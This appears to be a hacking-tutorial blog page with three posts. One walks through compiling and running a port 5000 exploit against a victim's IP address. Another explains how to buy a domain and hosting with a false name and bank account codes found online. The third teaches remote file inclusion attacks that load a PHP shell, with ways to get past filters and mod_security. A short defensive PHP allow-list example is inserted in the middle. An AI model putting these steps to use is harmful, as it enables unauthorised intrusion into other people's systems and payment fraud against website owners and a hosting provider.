Showing posts with label Tutorials H4Ckîng [EN]. Show all posts

An exploit is code written in C, VB, etc. that takes advantage of an open port.
This guide will teach you how to hack into a computer without sending any trojan server, in other words, using exploits.

In the following steps I'll show you how to hack into a computer using a port 5000 exploit, but you can do the same for other ports; just download their exploit from:


- Google.com
- Securiteam.com
- K-otik.com
- Astalavista.box.sk
- Coromputer.net
- Securityfocus.com

(Search the exploit as: "Exploit for PORT NUMBER")

STEP 1: Download the port 5000 exploit. Usually the exploits come as .txt and you need to change them to .c

http://planet.nana.co.il/progroup/exploits/5000e.zip

After downloading and extracting the port 5000 exploit we need to compile it (convert it to .exe). In order to compile the exploit we need the "Cygwin" program.

http://sources.redhat.com/cygwin/setup.exe

STEP 2: Open the Cygwin setup.exe and install it by the following pictures:











STEP 3: After installing the program we need to compile the exploit. Place the 5000.c exploit in C:\cygwin\bin,
then run the command line from Start - Run - cmd/command.
In the command window type:

CD c:\cygwin\bin
gcc 5000.c -o 5000.exe

(CD = Open)

Or follow by the picture:


STEP 4: After we have finished compiling the exploit we can use it! =)
In order to connect to the victim's computer that has port 5000 open in this case,
open the command line by Start - Run,
then type:


CD c:\cygwin\bin
5000.exe XXX.XXX.XXX.XXX -e

(XXX.XXX.XXX.XXX = Victims IP address)

Or follow by the picture:



Source: hxxp://prorat.net/forum/viewtopic.php?t=1838



Okay guys ... i made a tuto on how to get a website with a domain name (.com .net .info etc.).
Ready ... let's start!

Step 1 -
You need a valid german proxy ... go to
http://www.xroxy.com/proxy---DE-ssl.htm
And find one, and set it ... then go here
http://www.ip-adress.com, if it shows a location in Germany then the proxy was valid, if it shows your location then find another proxy ;)

Step 2 -
We go here:
http://www.1und1.de/
and press 1&1 produkte on the menu on the top!



Step 3 -
Then we put in the domain we want, just the name, e.g. hackstock, not http://www.hackstock.com, just hackstock
and check all the boxes


Step 4 -
Now we see which domains are available ... and which are not. If their status is "Ist frei" they are available
We choose one ... for the others remove the check, choose just one


Step 5 -
Now we have to choose which pack we want. We choose the third, cause with that pack comes a host + domain name


Step 6 -
Scroll the page down and press WEITER


Step 7 -
Now on the next page give a name (not yours), address, PLZ/ORT... a phone number 030/xxxxxxx, your gmail email address (the confirmation goes there ;) (remember ... a gmail address, cause it doesn't support hotmail!)


Step 8
Now here is the hard part ... we need a blz konto ... go to http://www.bing.com and search for
"blz konto postbank germany 2009" (without "")
And you get a lot of blz kontos. Find a good one (go to page 5...6...7...nobody goes there, u can find some fresh blz's). When u have found one put it in the boxes and remove the characters, e.g.
if the blz konto was in this form 123 445-65, you need to post it like this 12344565

Step 9 -
Now put a password twice ... the passwords must match ... and a secret answer


Step 10 -
Accept the TOS and press Bestellung

Step 10 -
When u get a page like in this image, u are done ... wait 24h for the activation ;)


Step 11 -
Check your gmail inbox for any message from 1&1
It should look like this

http://img91.imageshack.us/img91/2816/21214190.jpg

If u didn't receive any message then not :S ... search for another blz konto ...

P.S... this is the last webpage that i bought in this way http://www.php-mailer.com/
Don't forget ... it takes 24h for the activation ;)
Try it :D:D





about remote file inclusion |RFI|

remote file inclusion is where you include a remote file..usually the file you include will be for malicious purposes

backdoors

what is a backdoor

well your house has a front door...that usually is supposed to be welcoming
a backdoor doesn't look welcoming because people aren't usually supposed to use it

a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is set up correctly
a backdoor usually runs as a hidden process and will open various ports and accept commands from the hacker that is using it

shell

what is a shell

there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php,java,c and other various languages

today i will explain what a php shell is

a php shell is a script in php designed to take user inputted commands and browse files, execute commands, edit files, upload files, like a file manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..



remote file inclusion usually happens when someone makes a php script that doesn't sanitize the user's input, and there are no restrictions running on the server hosting the website with the vulnerable page

a vulnerable page's source code may have this in it



this would mean that

"page" without the quotes is the variable

so you would type

site.com/index.php?page=http://site.com/shell.txt?


note: it must have a .txt extension on the server, otherwise it will run on the other server where the remote file is located

also rfi won't work if allow_url_fopen or allow_url_include is disabled or if the page is patched

in order to patch their script in php they should replace

require($page . "faq.php");

with

require("faq.php");

and then the script can't take user input through the url
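
The patch above removes the dynamic include entirely. When a page does have to choose a file from the URL, an allow-list keeps the request value out of the path altogether. The following is an added example, not code from the original post; the page names and the pages/ directory are hypothetical, and it assumes PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Added example, not from the original post. Page names and the pages/
// directory are hypothetical.
//
// Vulnerable pattern quoted in the post: the request value becomes part of
// the path, so a URL in ?page= is fetched and executed:
//     require($page . "faq.php");

const PAGES_DIR = __DIR__ . '/pages';
const PAGE_MAP  = [               // accepted ?page= values => fixed local files
    'home' => 'home.php',
    'faq'  => 'faq.php',
    'docs' => 'docs.php',
];

function resolve_page(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; anything but an exact string key fails.
    // A URL (http:// or ftp://), an encoded link, or a value ending in "?"
    // or a NUL byte is not a key, so it never reaches the filesystem.
    if (!is_string($requested) || !array_key_exists($requested, PAGE_MAP)) {
        return null;
    }
    // Defence in depth: the mapped file must resolve inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$requested]);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? 'home';
$file = resolve_page($requested);
if ($file === null) {
    // Log the rejected value encoded and truncated so it cannot forge log lines.
    $shown = is_string($requested) ? rawurlencode(substr($requested, 0, 200)) : '(non-string)';
    error_log('index.php: rejected page parameter: ' . $shown);
    http_response_code(404);
    exit('Page not found');
}
require $file;
```

Keeping allow_url_include = Off in php.ini (the PHP default) blocks URL includes even if a dynamic include is reintroduced later, and the rejected-parameter log lines give a place to watch for inclusion attempts.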

also if there is mod_security enabled try encoding the shell link in base 64 or hex code

and for scripts that don't fully sanitise the user input but do check to a certain extent

use the nullbyte trick at the very end of the url

eg:
site.com/index.php?page=http://site.com/shell.txt?


well if there is anything i missed, tell me


edit:
thought of 2 i forgot myself

some filters filter out http:// so try ftp:// instead
so instead of using the http protocol use the ftp protocol

also try converting the shells link to binary
eg

site.com/index.php?page=binary string


---------updated

okies this is just a small update

sometimes a site may have in its code some security code to make it so that the file MUST have an extension of .html or something or .pdf

so if you attacked

127.0.0.1/index.php?page=document.pdf


and changed the document.pdf to your shell link

127.0.0.1/index.php?page=http://shell.com/shell.txt?


and got an error like this

warning: failed for inclusion http://site.com/shell.txt.pdf? blah blah blah

notice your input was shell.txt and it tried including a file called shell.txt.pdf

then you would go to your shell host and create a rule with a .htaccess file with the following code

AddType application/octet-stream pdf

you could also make it show the php file as a text file by using

AddType text/plain pdf

save this as a .htaccess file with 1 of the 2 codes above

anyways now lets get to the interesting part


now let's remember your php shell must end in a .pdf extension but show as a txt file

so rename your file shell.txt to shell.pdf

now go to your victim site and don't include the extension, let the php code do the work for ya ;) teamwork is always useful


and use

127.0.0.1/index.php?page=http://shell.com/shell


because the script automatically adds the .pdf extension for you so you have
127.0.0.1/index.php?page=http://shell.com/shell.pdf


sweet!

anyways hope this is useful to some ppl



 